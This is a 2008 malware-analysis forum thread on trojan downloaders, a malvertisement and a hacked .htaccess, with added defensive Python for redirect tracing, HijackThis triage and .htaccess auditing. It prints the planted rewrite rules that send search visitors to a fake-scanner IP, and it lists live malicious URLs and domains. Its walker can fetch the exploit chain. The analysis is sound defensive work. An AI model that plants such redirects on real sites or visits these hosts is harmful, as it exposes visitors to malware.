Ikarus T3.1.1.34.0 2008.08.12 -
K7AntiVirus 7.10.411 2008.08.11 -
Kaspersky 7.0.0.125 2008.08.12 Trojan-Downloader.Win32.Small.aatc
McAfee 5358 2008.08.11 -
Microsoft 1.3807 2008.08.12 TrojanDownloader:Win32/Renos.gen!AQ
NOD32v2 3347 2008.08.11 a variant of Win32/TrojanDownloader.FakeAlert.FZ
Norman 5.80.02 2008.08.11 -
Panda 9.0.0.4 2008.08.11 -
PCTools 4.4.2.0 2008.08.11 -
Rising 20.57.02.00 2008.08.11 -
Sophos 4.32.0 2008.08.12 Mal/EncPk-CZ
Sunbelt 3.1.1538.1 2008.08.09 -
Symantec 10 2008.08.12 -
TheHacker 6.2.96.395 2008.08.08 -
TrendMicro 8.700.0.1004 2008.08.11 -
VBA32 3.12.8.3 2008.08.11 -
ViRobot 2008.8.11.1331 2008.08.11 -
VirusBuster 4.5.11.0 2008.08.11 -
Webwasher-Gateway 6.6.2 2008.08.12 Trojan.Dldr.Small.aatc
Note: This file is usually known to download and install fake antivirus solutions. It has anti-VM & sandbox features built in.
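The capture above passes through several 302 responses whose bodies also carry a meta refresh, and the in.cgi hops are a traffic distribution system that keys on the Referer, User-Agent and cookies. The walker below is an added example, not code from the post: it follows a chain one hop at a time, keeps the original Referer on every request, resolves relative Location values, falls back to `<meta http-equiv="refresh">` when there is no redirect header, and stops on loops or after a hop limit. The `fetch(url, headers)` transport is pluggable; `CAPTURED` and `fake_fetch` are constructed from the responses quoted in the post so the walk runs offline (the fourth hop is changed to a 200 carrying only a meta refresh, to exercise that path), and `urllib_fetch` is the live transport for a lab machine.

```python
"""Follow a redirect chain hop by hop, keeping the original Referer."""
import re
from html import unescape
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}
META_REFRESH_RE = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\s*\d+\s*;\s*url=\s*[\'"]?([^\'">]+)',
    re.I)


def next_hop(url, status, headers, body):
    """Return the URL a browser would load next, or None if this page is final."""
    location = {k.lower(): v for k, v in headers.items()}.get('location')
    if status in REDIRECT_CODES and location:
        return urljoin(url, location)
    m = META_REFRESH_RE.search(body or '')
    if m:
        return urljoin(url, unescape(m.group(1)).strip())
    return None


def follow_chain(start_url, fetch, referer, user_agent, max_hops=10):
    """Walk from start_url; return (hops, final_body) with hops = [(url, status)]."""
    headers = {'Referer': referer, 'User-Agent': user_agent}
    hops, seen, url = [], {start_url}, start_url
    for _ in range(max_hops):
        status, resp_headers, body = fetch(url, headers)
        hops.append((url, status))
        nxt = next_hop(url, status, resp_headers, body)
        if nxt is None:
            return hops, body
        if nxt in seen:
            raise RuntimeError('redirect loop back to %s' % nxt)
        seen.add(nxt)
        url = nxt
    raise RuntimeError('gave up after %d hops from %s' % (max_hops, start_url))


def meta_refresh_page(target):
    """Body shaped like the TDS responses in the capture (constructed)."""
    return '<html><head><meta http-equiv="REFRESH" content="1; URL=\'%s\'"></head></html>' % target


# Constructed offline stand-in for the network, keyed by URL.
CAPTURED = {
    'http://plj.dagoth.in/': (302, {'Location': 'http://mn96.dns.gendistr.info/qualitytest/'}, ''),
    'http://mn96.dns.gendistr.info/qualitytest/': (302, {'Location': 'http://td.weblode.biz/ts/in.cgi?eadle'}, ''),
    'http://td.weblode.biz/ts/in.cgi?eadle': (302, {'Location': 'http://td.weblode.biz/tds/in.cgi?3&group=1'},
                                              meta_refresh_page('http://td.weblode.biz/tds/in.cgi?3&group=1')),
    # constructed variation: no Location header, meta refresh only
    'http://td.weblode.biz/tds/in.cgi?3&group=1': (200, {'Content-Type': 'text/html'},
                                                  meta_refresh_page('http://dergamend.com/roy/')),
    'http://dergamend.com/roy/': (200, {'Content-Type': 'text/html'}, '<html><script>/* obfuscated */</script></html>'),
}


def fake_fetch(url, headers):
    """Offline transport: answer from CAPTURED, 404 for anything else."""
    return CAPTURED.get(url, (404, {}, ''))


def urllib_fetch(url, headers, timeout=10):
    """Live transport for an isolated lab box: one request, no automatic redirects."""
    import urllib.error
    import urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # surface the 3xx instead of following it

    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.build_opener(NoRedirect).open(req, timeout=timeout) as r:
            return r.status, dict(r.headers), r.read(65536).decode('latin-1')
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read(65536).decode('latin-1')


if __name__ == '__main__':
    hops, _ = follow_chain('http://plj.dagoth.in/', fake_fetch,
                           'http://www.rebondottignies.be/',
                           'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)')
    for url, status in hops:
        print(status, url)
```

Swap `fake_fetch` for `urllib_fetch` only on a disposable analysis machine: the final hop serves the exploit page, and a TDS that sees a modern User-Agent or no Referer may route you somewhere else entirely, so record what you sent alongside each hop.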
Kimberly
<h4>
Another nifty Flash file
</h4>
Here we go again: i115.swf, one of those nifty little Flash files, will download a file called SW.exe from the server. SW.exe will drop msgmr.dll into the Program Files\Messenger folder and will load the DLL with the help of rundll32.exe.
IPB Image
About 5 minutes later, rundll32.exe will start a hidden instance of Internet Explorer.
20:01:43 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [468]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
A very small gif file will be downloaded. moon.gif isn't a real image; it's a text file which contains a list of additional files to download. All will "pretend" to be gif files but they ain't.
IPB Image
The last 3 files are the worst: one is a self-update and 2 of them will install drivers. d.gif will also write into the memory address space of explorer.exe.
IPB Image
Let's detail those drivers a little bit.

b.gif
  • service: 1120561ErrorControl - random numbers + ErrorControl
  • file: %temp%\dump_wmimmc.sys - will be deleted once loaded
  • file: %windows%\Downloaded Program Files\ThunderAdvise.dll
d.gif
  • file: %windows%\linkinfo.dll
  • file: %system%\drivers\IsDrv122.sys - mimics IceSword driver
  • service: eth8023
  • file: %system%\drivers\eth8023.sys
Information about hardware will be posted back and a final update will be performed. This is Chinese stuff; it's very complex and often difficult to remove from a computer.

There is also a new key created under HKEY_CURRENT_USER called avs which contains a lot of settings related to OS settings.
IPB Image
Visible signs.
O2 - BHO: ThunderAdvise - {97421D0D-E07F-40DF-8F07-99597B9585AD} - C:\WINDOWS\Downloaded Program Files\ThunderAdvise.dll
O4 - HKLM\..\Run: [3PMmUpdate] rundll32 "C:\WINDOWS\Update.dll",Main
O20 - AppInit_DLLs: mssetd.dll lenowos.dll sunesn.dll esceps.dll cmonos.dll offscrl.dll cxhole.dll therbrek.dll rmbsony.dll manleu.dll wdhotem.dll jolinos.dll keyiftp.dll baccops.dll xpsbos.dll crtnumo.dll dickus.dll zlcdps.dll
O21 - SSODL: msnmsg - {DA191DE0-AA86-4ED0-4B87-293D48B2AE99} - C:\Program Files\Messenger\msgmr.dll
O21 - SSODL: sysocmgr - {DA1DE019-A6A8-ED40-4B87-248B2A93DE99} - C:\WINDOWS\sysocmgr.dll
O21 - SSODL: ThunderAdvise - {97421D0D-E07F-40DF-8F07-99597B9585AD} - C:\WINDOWS\Downloaded Program Files\ThunderAdvise.dll
The following entries may be present in the HOSTS file. (I did not always get them during different runs)
O1 - Hosts: 202.165.102.205 972.aksjd11.com
O1 - Hosts: 202.165.102.205 w3og.cn
O1 - Hosts: 203.208.35.100 qazc.fourtw.cn
O1 - Hosts: 203.208.35.100 www.aujoy.cn
O1 - Hosts: 203.208.35.101 www.hao601.cn
O1 - Hosts: 203.208.35.101 www.psp476.cn
O1 - Hosts: 72.14.235.99 222.1212l112.net
O1 - Hosts: 72.14.235.99 444.1212l112.netn
O1 - Hosts: 72.14.235.99 555.1212l112.net
O1 - Hosts: 72.14.235.99 111.1212l112.net
O1 - Hosts: 65.55.21.250 111.3243l24.com
O1 - Hosts: 65.55.21.250 222.3243l24.com
O1 - Hosts: 65.55.21.250 333.3243l24.com
O1 - Hosts: 125.64.8.112 kao2.gmwo03.com
O1 - Hosts: 125.64.8.112 kao.gmwo06.com
O1 - Hosts: 125.64.8.112 444.gmwo07.com
O1 - Hosts: 116.252.185.15 ru.update365.us
O1 - Hosts: 116.252.185.15 ad.update365.us
O1 - Hosts: 207.46.232.182 popmails.net
O1 - Hosts: 203.208.37.99 3.goodhh.com
O1 - Hosts: 220.181.37.55 down.rwixr.com
O1 - Hosts: 160.79.42.52 www.xdj2008.com
O1 - Hosts: 63.175.76.152 www.revtr.cn
O1 - Hosts: 219.133.40.91 qq.ljsll.com
O1 - Hosts: 203.208.35.102 www.aassccwe.cn
O1 - Hosts: 209.132.177.50 973.aksjd11.com
O1 - Hosts: 209.132.177.50 974.aksjd11.com
O1 - Hosts: 209.132.177.50 971.aksjd11.com
O1 - Hosts: 209.132.177.50 975.aksjd11.com
O1 - Hosts: 72.14.235.104 user1.12-39.net
O1 - Hosts: 72.14.235.147 www.infomt.net
O1 - Hosts: 192.150.18.101 ata1.sysions.net
O1 - Hosts: 192.150.18.101 ata2.sysions.net
O1 - Hosts: 192.150.18.101 ata3.sysions.net
O1 - Hosts: 192.150.18.101 ata4.sysions.net
O1 - Hosts: 193.120.42.226 8nnnnn99.cn
O1 - Hosts: 24.39.54.34 www.haoaoao.cn
Detection by Kaspersky.
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\10.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spif C:\Documents and Settings\KLY\Local Settings\Temp\11.gif
Deleted: Heur.Trojan.Generic C:\Documents and Settings\KLY\Local Settings\Temp\12.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snzz C:\Documents and Settings\KLY\Local Settings\Temp\13.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sphp C:\Documents and Settings\KLY\Local Settings\Temp\14.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqak C:\Documents and Settings\KLY\Local Settings\Temp\15.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snzy C:\Documents and Settings\KLY\Local Settings\Temp\16.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spcu C:\Documents and Settings\KLY\Local Settings\Temp\17.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spcp C:\Documents and Settings\KLY\Local Settings\Temp\18.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\Documents and Settings\KLY\Local Settings\Temp\1a.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\Documents and Settings\KLY\Local Settings\Temp\1d.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqah C:\Documents and Settings\KLY\Local Settings\Temp\2.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.smnv C:\Documents and Settings\KLY\Local Settings\Temp\20.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spzz C:\Documents and Settings\KLY\Local Settings\Temp\21.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snxy C:\Documents and Settings\KLY\Local Settings\Temp\22.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.shhw C:\Documents and Settings\KLY\Local Settings\Temp\23.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sowa C:\Documents and Settings\KLY\Local Settings\Temp\24.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sokj C:\Documents and Settings\KLY\Local Settings\Temp\26.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snyb C:\Documents and Settings\KLY\Local Settings\Temp\28.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snxy C:\Documents and Settings\KLY\Local Settings\Temp\29.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spix C:\Documents and Settings\KLY\Local Settings\Temp\3.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.snxy C:\Documents and Settings\KLY\Local Settings\Temp\30.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\Documents and Settings\KLY\Local Settings\Temp\31.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sqah C:\Documents and Settings\KLY\Local Settings\Temp\32.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spix C:\Documents and Settings\KLY\Local Settings\Temp\33.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\34.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\35.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.shig C:\Documents and Settings\KLY\Local Settings\Temp\36.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spmq C:\Documents and Settings\KLY\Local Settings\Temp\37.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sojh C:\Documents and Settings\KLY\Local Settings\Temp\38.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.awlz C:\Documents and Settings\KLY\Local Settings\Temp\39.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\4.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\5.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.shig C:\Documents and Settings\KLY\Local Settings\Temp\6.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.spmq C:\Documents and Settings\KLY\Local Settings\Temp\7.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.sojh C:\Documents and Settings\KLY\Local Settings\Temp\8.gif
Deleted: Trojan-GameThief.Win32.OnLineGames.awlz C:\Documents and Settings\KLY\Local Settings\Temp\9.gif
Deleted: Trojan-Downloader.Win32.Agent.wxq C:\Documents and Settings\KLY\Local Settings\Temp\b.gif
Deleted: Trojan-Downloader.Win32.Small.aacq C:\Documents and Settings\KLY\Local Settings\Temp\c.gif
Deleted: Trojan-Dropper.Win32.Small.axv C:\Documents and Settings\KLY\Local Settings\Temp\d.gif
Deleted: Trojan.Win32.Agent.qnw C:\Documents and Settings\KLY\Local Settings\Temp\dump_wmimmc.sys
Deleted: Virus.Win32.Alman.b C:\WINDOWS\system32\drivers\IsDrv122.sys
Deleted: Trojan-Downloader.Win32.Small.zgf C:\sw.exe
Deleted: Trojan-GameThief.Win32.OnLineGames.sngv C:\Documents and Settings\KLY\Local Settings\Temp\40.gif
Deleted: Trojan-Downloader.Win32.Small.zgf C:\Program Files\Capture\logs\deleted_files\C:\sw.exe
Deleted: Trojan-Downloader.Win32.Agent.yuv C:\Program Files\Messenger\msgmr.dll
Deleted: Trojan-Downloader.Win32.Small.hlp C:\WINDOWS\AppPatch\AcSpecf.dll
Deleted: Trojan-Spy.Win32.FtpSend.b C:\WINDOWS\AppPatch\AcXtrnel.sdb
Deleted: Trojan-Downloader.Win32.Small.yvn C:\WINDOWS\Fonts\Framdee.ttf
Deleted: Trojan-Downloader.Win32.Agent.erl C:\WINDOWS\linkinfo.dll
Deleted: Trojan.Win32.Agent.xwr C:\WINDOWS\system32\baccops.dll
Deleted: Trojan.Win32.Agent.xzu C:\WINDOWS\system32\cmonos.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sjbb C:\WINDOWS\system32\crtnumo.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.spim C:\WINDOWS\system32\cxhole.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sogz C:\WINDOWS\system32\ddserh.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.bkke C:\WINDOWS\system32\dickus.dll
Deleted: Trojan-Spy.Win32.FtpSend.a C:\WINDOWS\system32\drivers\eth8023.sys
Deleted: Trojan-Spy.Win32.Agent.dhi C:\WINDOWS\system32\esceps.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.smxr C:\WINDOWS\system32\fmcvxy.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.spqo C:\WINDOWS\system32\hhrdxd.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.snoc C:\WINDOWS\system32\jhfrxz.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sncz C:\WINDOWS\system32\jolinos.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.soqc C:\WINDOWS\system32\keyiftp.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.bkgz C:\WINDOWS\system32\lenowos.dll
Deleted: Trojan-Spy.Win32.Agent.dpw C:\WINDOWS\system32\manleu.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.somn C:\WINDOWS\system32\mssetd.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sqcs C:\WINDOWS\system32\mssetdk.exe
Deleted: Trojan-GameThief.Win32.OnLineGames.sqei C:\WINDOWS\system32\offscrl.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sozc C:\WINDOWS\system32\rmbsony.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.snuq C:\WINDOWS\system32\sgdewg.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sphn C:\WINDOWS\system32\sunesn.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sohb C:\WINDOWS\system32\tdfhex.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sodi C:\WINDOWS\system32\therbrek.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.snnd C:\WINDOWS\system32\wdhotem.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sokr C:\WINDOWS\system32\wrqszl.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sogy C:\WINDOWS\system32\wzcfsw.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.spwo C:\WINDOWS\system32\xpsbos.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.soha C:\WINDOWS\system32\zgtwfx.dll
Deleted: Trojan-GameThief.Win32.OnLineGames.sodl C:\WINDOWS\system32\zlcdps.dll
Undetected atm.
  • 08/13/2008 24,576 1.gif
  • 08/13/2008 24,576 a.gif
  • 08/13/2008 256,667 AcSpecf.sdb
  • 08/04/2004 18,432 mshta.dll
  • 08/13/2008 19,456 sysocmgr.dll
  • 08/13/2008 45,056 ThunderAdvise.dll
Update
1.gif - Trojan-Proxy.Win32.Agent.awt
a.gif - Trojan-Proxy.Win32.Agent.awt
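The "visible signs" above are HijackThis-style lines, and each section code maps to a persistence point worth a specific check. The script below is an added example, not from the post: it parses the O1/O2/O4/O20/O21 line formats and applies ordinary triage rules that the post does not spell out (a hosts entry that is not loopback is a DNS override; on the XP-era systems in this thread any AppInit_DLLs value is a DLL loaded into every process that maps user32.dll; SSODL handlers are loaded by explorer.exe at logon; a Run entry that starts rundll32 on a DLL is a loader). `SAMPLE_LOG` is constructed from a subset of the lines quoted in the post, with one benign loopback line added to show the non-finding case.

```python
"""Triage HijackThis-style log lines for the persistence points listed above."""
import re
from collections import defaultdict

SAMPLE_LOG = r"""
O1 - Hosts: 202.165.102.205 972.aksjd11.com
O1 - Hosts: 202.165.102.205 w3og.cn
O1 - Hosts: 72.14.235.99 222.1212l112.net
O1 - Hosts: 72.14.235.99 111.1212l112.net
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: ThunderAdvise - {97421D0D-E07F-40DF-8F07-99597B9585AD} - C:\WINDOWS\Downloaded Program Files\ThunderAdvise.dll
O4 - HKLM\..\Run: [3PMmUpdate] rundll32 "C:\WINDOWS\Update.dll",Main
O20 - AppInit_DLLs: mssetd.dll lenowos.dll sunesn.dll esceps.dll
O21 - SSODL: msnmsg - {DA191DE0-AA86-4ED0-4B87-293D48B2AE99} - C:\Program Files\Messenger\msgmr.dll
O21 - SSODL: sysocmgr - {DA1DE019-A6A8-ED40-4B87-248B2A93DE99} - C:\WINDOWS\sysocmgr.dll
"""

LINE_RE = re.compile(r'^(O\d+) - (.*)$')
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?', re.I)
LOOPBACK = {'127.0.0.1', '::1'}


def parse_hjt(text):
    """Yield (section, payload) for every 'Oxx - ...' line; skip anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2)


def _name_and_path(payload):
    # "BHO: Name - {CLSID} - C:\path.dll" and "SSODL: Name - {CLSID} - C:\path.dll"
    parts = [p.strip() for p in payload.split(' - ')]
    return parts[0].split(':', 1)[1].strip(), parts[-1]


def triage(text):
    """Return {check: [findings]} for the log text."""
    findings = defaultdict(list)
    hosts_by_ip = defaultdict(list)
    for section, payload in parse_hjt(text):
        if section == 'O1':
            _, ip, host = payload.split(None, 2)      # "Hosts: <ip> <name>"
            if ip not in LOOPBACK:
                hosts_by_ip[ip].append(host)
        elif section == 'O2':
            findings['bho'].append(_name_and_path(payload))
        elif section == 'O4':
            m = RUNDLL_RE.search(payload)
            if m:
                findings['rundll32_run'].append(m.group(1))
        elif section == 'O20' and payload.startswith('AppInit_DLLs:'):
            findings['appinit_dlls'].extend(payload.split(':', 1)[1].split())
        elif section == 'O21':
            findings['ssodl'].append(_name_and_path(payload))
    # group overrides by IP: many unrelated names pinned to one IP is the pattern above
    for ip, hosts in hosts_by_ip.items():
        findings['hosts_override'].append((ip, hosts))
    return dict(findings)


def summarize(findings):
    """Human-readable lines, highest-impact items first."""
    out = []
    for dll in findings.get('appinit_dlls', []):
        out.append('AppInit_DLLs loads %s into every user32 process' % dll)
    for name, path in findings.get('ssodl', []):
        out.append('SSODL %s -> %s (runs in explorer.exe at logon)' % (name, path))
    for dll in findings.get('rundll32_run', []):
        out.append('Run key starts rundll32 on %s' % dll)
    for name, path in findings.get('bho', []):
        out.append('BHO %s -> %s' % (name, path))
    for ip, hosts in findings.get('hosts_override', []):
        out.append('hosts: %d name(s) pinned to %s: %s' % (len(hosts), ip, ', '.join(hosts)))
    return out


if __name__ == '__main__':
    for line in summarize(triage(SAMPLE_LOG)):
        print(line)
```

The AppInit_DLLs line deserves the first look: eighteen DLLs there, as in the post, means every GUI process on the box is carrying that code, so cleaning files without clearing the value only gets them re-dropped.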
Kimberly
<h4>
New malvertizement for cardstore.com
</h4>
Courtesy of Sandi.

cardstore.com.
IPB Image
IPB Image
Fuse Kit 2.1.4 has been used in this malvertizement. Just like Sandi, I would advise extreme caution for any advertisement built with this kit. I have never encountered Fuse Kit in "legit" advertisements. More info.
The malvert was received from trackstarmedia.com. The domain has been suspended due to invalid Whois information. Full story.
Kimberly
<h4>
Redirected to .... from search engines - .htaccess hack
</h4>
I was reading some of the forum posts mentioning the use of the clipboard & malware URLs - which I experienced myself on isuisse btw - on Sandi's Blog when I ran into something way more frightening ...

From this comment.

Another person complains of the clipboard problem - you can see the discussion here:
http://forums.devnetwork.net/viewtopic.php...48&p=477521
The same person made another post here.
Ok guys, I'd love to hear thoughts on this one. I had a very strange thing happen to me today. I found out that my .htaccess file had been edited by _someone_ to have this in it:

CODE
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err

I'm not entirely sure what all of that means. However, I now know that all my 404s were getting redirected to 87.248.180.88 (which seems to be spam/virus-ey). I discovered this by almost pure chance. I've alerted my hosting provider, have changed all my passwords, and removed all the code that I could find. However, I'm _very_ curious as to how this got into my .htaccess file.

I would be _very_ surprised if someone had guessed my password since it's rather strong (8+ characters, capitalization thrown in and numbers/special chars).
I'm pretty sure that none of the php scripts on my server have access to this file, but I could be wrong (?).
Any ideas?
For those not familiar with .htaccess, we will explain what those lines do.
  1. If the header of your browser tells the website you're visiting that you come from the Google, AOL, MSN, Altavista, Ask or Yahoo search engine, you will be redirected to 87.248.180.88/in.html?s=hg.
  2. If you request a page that doesn't exist on the website you will get redirected to 87.248.180.88/in.html?s=hg_err instead of the usual 404 not found.
Let's have a closer look at those URLs using a sniffer. In both cases we'll see a redirect to a fake online scanner.

87.248.180.88/in.html?s=hg
IPB Image
CODE
HTTP/1.1 302 Found
Date: Fri, 15 Aug 2008 18:04:16 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.5
Set-Cookie: visited=1
Location: http://scanner.antivir64.com/?aff=1050
Connection: close
Content-Type: text/html
Redirect.
scanner.antivir64.com/?aff=1050
IPB Image
______________________________

87.248.180.88/in.html?s=hg_err
IPB Image
CODE
HTTP/1.1 302 Found
Date: Fri, 15 Aug 2008 18:29:50 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.5
Set-Cookie: visited=1
Location: http://greatvideo3.com/soft.php?aid=0147&d=3&product=XPA
Connection: close
Content-Type: text/html
Redirect.
greatvideo3.com/soft.php?aid=0147&d=3&product=XPA
internet-defense2009.com/2009/1/freescan.php?aid=880147
IPB Image
<h4>
87.248.180.88
</h4>
A Google search on 87.248.180.88 already reveals 41 results.
IPB Image
Below are a few reports from that search.
http://support.mozilla.com/tiki-view_forum_thread.php?comments_parentId=115906&forumId=1
http://forums.digitalpoint.com/showthread.php?t=968388
http://www.webhostingtalk.com/showthread.php?p=5234158
http://www.talkweather.com/forums/index.php?s=&showtopic=48260&view=findpost&p=595288
It seems that many iPower websites are affected as hacking started back in 2007 on those servers. Talkweather.com is hosted on ThePlanet and so is www.HuxleyGame.com (ns on hostgator.com).

IP details to follow in a few ...
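The two-point explanation of the .htaccess above is exactly what a site owner needs to check for, and the check is mechanical. The script below is an added example, not code from the post or from the quoted devnetwork.net poster: it parses the RewriteCond/RewriteRule/ErrorDocument directives, flags every redirect target whose host is not the site's own (a raw IP target is marked separately, since legitimate rewrites almost never send visitors to a bare address), and simulates which Referer values trip the rule using mod_rewrite's grouping, where a run of `[OR]` conditions forms one group and the groups are ANDed. Only the subset of mod_rewrite syntax in the quoted file is handled. `HTACCESS_SAMPLE` is that file; `OWN_HOST` is an assumed hostname for the off-site comparison.

```python
"""Audit an .htaccess for referrer-keyed, off-site redirects."""
import re
from urllib.parse import urlparse

HTACCESS_SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
"""
OWN_HOST = 'www.example.org'  # assumed: the hostname this .htaccess belongs to

COND_RE = re.compile(r'^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?$', re.I)
RULE_RE = re.compile(r'^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$', re.I)
ERRDOC_RE = re.compile(r'^ErrorDocument\s+(\d{3})\s+(\S+)$', re.I)
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def _flags(raw):
    return {f.strip().upper() for f in (raw or '').split(',') if f.strip()}


def parse_htaccess(text):
    """Return (conds, rules, errordocs).

    conds: [(compiled regex, has_OR_flag)] in file order
    rules: [(pattern, target, flags)]
    errordocs: [(status, target)]
    """
    conds, rules, errordocs = [], [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        m = COND_RE.match(line)
        if m:
            flags = _flags(m.group(2))
            conds.append((re.compile(m.group(1), re.I if 'NC' in flags else 0), 'OR' in flags))
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group(1), m.group(2), _flags(m.group(3))))
            continue
        m = ERRDOC_RE.match(line)
        if m:
            errordocs.append((int(m.group(1)), m.group(2)))
    return conds, rules, errordocs


def referer_triggers(conds, referer):
    """Evaluate the condition chain the way mod_rewrite does.

    Consecutive conditions carrying [OR] form one group that is true if any
    member matches; the groups are ANDed. No conditions at all means the
    RewriteRule fires for every request. An empty Referer (typed URL,
    bookmark, referrer-stripping browser) matches none of these patterns.
    """
    groups, current = [], []
    for regex, has_or in conds:
        current.append(regex)
        if not has_or:
            groups.append(current)
            current = []
    if current:  # file ended on an [OR] condition
        groups.append(current)
    return all(any(r.search(referer) for r in group) for group in groups)


def offsite_targets(rules, errordocs, own_host=OWN_HOST):
    """Flag every redirect target whose host is not our own site."""
    findings = []
    targets = [('RewriteRule', t) for _, t, _ in rules] + [('ErrorDocument', t) for _, t in errordocs]
    for kind, target in targets:
        host = urlparse(target).hostname
        if host and host.lower() != own_host.lower():
            findings.append((kind, target, bool(IPV4_RE.match(host))))
    return findings


def audit(text, referers, own_host=OWN_HOST):
    """One-shot report: off-site targets plus which sample referers get redirected."""
    conds, rules, errordocs = parse_htaccess(text)
    return {
        'offsite': offsite_targets(rules, errordocs, own_host),
        'redirected': {r: referer_triggers(conds, r) for r in referers},
    }


if __name__ == '__main__':
    samples = ['', 'http://www.google.com/search?q=basketball',
               'http://www.example.org/', 'http://www.mytask.example/']
    report = audit(HTACCESS_SAMPLE, samples)
    for kind, target, is_ip in report['offsite']:
        print('%s: off-site target %s%s' % (kind, target, ' (raw IP)' if is_ip else ''))
    for ref, hit in report['redirected'].items():
        print('%s  Referer=%r' % ('REDIRECT' if hit else 'serve   ', ref))
```

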